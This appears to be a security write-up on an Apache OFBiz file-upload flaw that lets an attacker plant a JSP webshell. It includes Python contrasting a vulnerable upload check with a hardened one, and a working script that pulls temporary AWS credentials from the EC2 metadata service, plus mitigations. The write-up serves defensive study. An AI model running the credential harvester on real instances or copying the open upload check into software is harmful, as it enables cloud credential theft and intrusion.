Preface: According to market statistics, about 152 companies use Apache OFBiz, most of them located in the United States and in the computer software industry.
Background: Apache OFBiz is a suite of business applications flexible enough to be used across any industry. It is an open source enterprise resource planning (ERP) system. Its common architecture lets developers extend or enhance it to build custom features.
Vulnerability focus: The reporter found that the upload handler under catalog/control does not check the extension of uploaded files. An attacker can therefore upload a JSP webshell and execute code with the privileges of the OFBiz process. If the vulnerable system runs on Amazon Elastic Compute Cloud (EC2), that code can also query the instance metadata service and retrieve temporary AWS credentials, because the metadata service is designed to hand them to anything running on the instance.
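The missing check beside a hardened one, as an added example written for this page (it is not OFBiz code and does not reproduce the real catalog/control handler). An image upload endpoint is assumed; the allowlist, the magic-byte table and the accepted name pattern are choices made for illustration. The point is that an extension check alone is weak: the name must be validated as a whole (one dot, safe characters, no path) so double extensions and NUL-byte tricks fail, the content must match the declared type, and the client's name must never be reused on disk.

```python
import re
import secrets

# Allowlist for an image upload endpoint (assumed policy). Everything else,
# including anything the servlet container would execute (jsp, jspx, jspf...),
# is refused.
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

# Whole-name pattern: one run of safe characters, exactly one dot, one extension.
# "cmd.jsp.png", "x.png\x00.jsp", "../x.png" and "x.png/" all fail to match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

# Leading bytes of the accepted formats (constructed table, not exhaustive).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def vulnerable_accept(filename: str, content: bytes) -> bool:
    """The missing check: the client-supplied name is trusted as-is, so a
    file called cmd.jsp lands in a servable directory and the container runs it."""
    return bool(filename)


def hardened_accept(filename: str, content: bytes) -> bool:
    """Accept only when the whole name is well-formed, the extension is
    allowlisted (case-insensitively) and the first bytes match that format."""
    m = SAFE_NAME.fullmatch(filename)
    if not m:
        return False
    ext = m.group(1).lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return False
    return any(content.startswith(sig) for sig in MAGIC[ext])


def storage_name(filename: str) -> str:
    """Never reuse the client's name on disk: keep only the validated
    extension and generate the rest server-side."""
    m = SAFE_NAME.fullmatch(filename)
    if not m or m.group(1).lower() not in ALLOWED_IMAGE_EXT:
        raise ValueError("call hardened_accept first")
    return f"{secrets.token_hex(16)}.{m.group(1).lower()}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8   # constructed PNG header
    for name, body in [("cmd.jsp", b"<% %>"), ("cmd.jsp.png", png),
                       ("Logo.PNG", png), ("logo.png", b"<% %>")]:
        print(name, vulnerable_accept(name, body), hardened_accept(name, body))
```

The container-side complement, not shown here, is to store uploads outside any directory the servlet container maps and to serve them through a handler that sets a fixed Content-Type, so that even a file that slips past validation is never interpreted as a JSP.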
Is there a reserved set of security credentials in AWS?
Instance identity credentials: every EC2 instance can obtain a set of temporary credentials from the instance metadata service (169.254.169.254) under /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance, even when no IAM role (instance profile) is attached. AWS documents these as internal-use credentials that let on-instance software identify the instance to AWS; they carry far narrower permissions than an instance-profile role, whose credentials, if a role is attached, sit under /latest/meta-data/iam/security-credentials/<role-name>. Either way, anything running on the instance, a JSP webshell included, can read them. IMDSv2 does not change that: it requires a session token obtained with a PUT request, which defeats many SSRF and open-proxy abuses but not code already executing on the host. The practical mitigations are to apply the OFBiz fix, to attach only a least-privilege role to the instance, and to watch for instance credentials being used from outside the instance (for example GuardDuty's InstanceCredentialExfiltration findings).
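How the credential retrieval described above works in practice, as an added example written for this page (not from the OFBiz report or any AWS tool). The metadata paths and the IMDSv2 token handshake are the real ones; the transport is pluggable so the harvesting logic can be exercised off-instance with a constructed IMDSv2 stand-in (fake_imds, with made-up key IDs and a made-up role name). On a real instance the same code talks to 169.254.169.254 through urllib_fetch.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional

IMDS = "http://169.254.169.254"
TOKEN_PATH = "/latest/api/token"
TOKEN_HDR = "X-aws-ec2-metadata-token"
# Served on every EC2 instance, whether or not an IAM role is attached.
INSTANCE_IDENTITY_CREDS = "/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
# Lists the attached instance-profile role (if any); appending the role name returns its credentials.
IAM_CREDS_DIR = "/latest/meta-data/iam/security-credentials/"

# fetch(method, path, headers) -> response body, or None on any HTTP/network error
Fetcher = Callable[[str, str, Dict[str, str]], Optional[str]]


def urllib_fetch(method: str, path: str, headers: Dict[str, str]) -> Optional[str]:
    """Real transport: talk to the link-local metadata endpoint."""
    req = urllib.request.Request(IMDS + path, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.read().decode()
    except (urllib.error.URLError, OSError):
        return None


def parse_credentials(body: str) -> Optional[Dict[str, str]]:
    """IMDS returns JSON with Code, AccessKeyId, SecretAccessKey, Token, Expiration."""
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if not isinstance(doc, dict) or doc.get("Code") != "Success":
        return None
    return {k: doc[k] for k in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")}


def harvest(fetch: Fetcher) -> Dict[str, Dict[str, str]]:
    """What code running on the instance can collect. IMDSv2 is satisfied by
    requesting a session token with PUT first; a local process can always do that."""
    headers: Dict[str, str] = {}
    token = fetch("PUT", TOKEN_PATH, {"X-aws-ec2-metadata-token-ttl-seconds": "60"})
    if token:
        headers[TOKEN_HDR] = token
    found: Dict[str, Dict[str, str]] = {}

    body = fetch("GET", INSTANCE_IDENTITY_CREDS, headers)
    creds = parse_credentials(body) if body else None
    if creds:
        found["ec2-instance"] = creds

    listing = fetch("GET", IAM_CREDS_DIR, headers)
    for role in (listing or "").split():
        body = fetch("GET", IAM_CREDS_DIR + role, headers)
        creds = parse_credentials(body) if body else None
        if creds:
            found[role] = creds
    return found


# Constructed IMDSv2 stand-in: fake token, fake key material, fake role name.
_FAKE_TOKEN = "constructed-session-token"
_FAKE_CREDS = json.dumps({
    "Code": "Success", "LastUpdated": "2021-04-01T00:00:00Z", "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLE000000001", "SecretAccessKey": "constructed-secret",
    "Token": "constructed-session", "Expiration": "2021-04-01T06:00:00Z",
})


def fake_imds(method: str, path: str, headers: Dict[str, str]) -> Optional[str]:
    if method == "PUT" and path == TOKEN_PATH:
        return _FAKE_TOKEN
    if headers.get(TOKEN_HDR) != _FAKE_TOKEN:
        return None  # IMDSv2-only instance: a GET without the token is a 401
    if path == INSTANCE_IDENTITY_CREDS:
        return _FAKE_CREDS
    if path == IAM_CREDS_DIR:
        return "ofbiz-app-role"
    if path == IAM_CREDS_DIR + "ofbiz-app-role":
        return _FAKE_CREDS
    return None


if __name__ == "__main__":
    print(json.dumps(harvest(urllib_fetch), indent=2))
```

The ec2-instance entry is always present on a real instance; the instance-profile entry is what matters to an attacker, and its value is exactly the role's IAM policy, which is why keeping that role minimal limits the blast radius of a webshell.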
Official announcement – https://issues.apache.org/jira/browse/OFBIZ-12080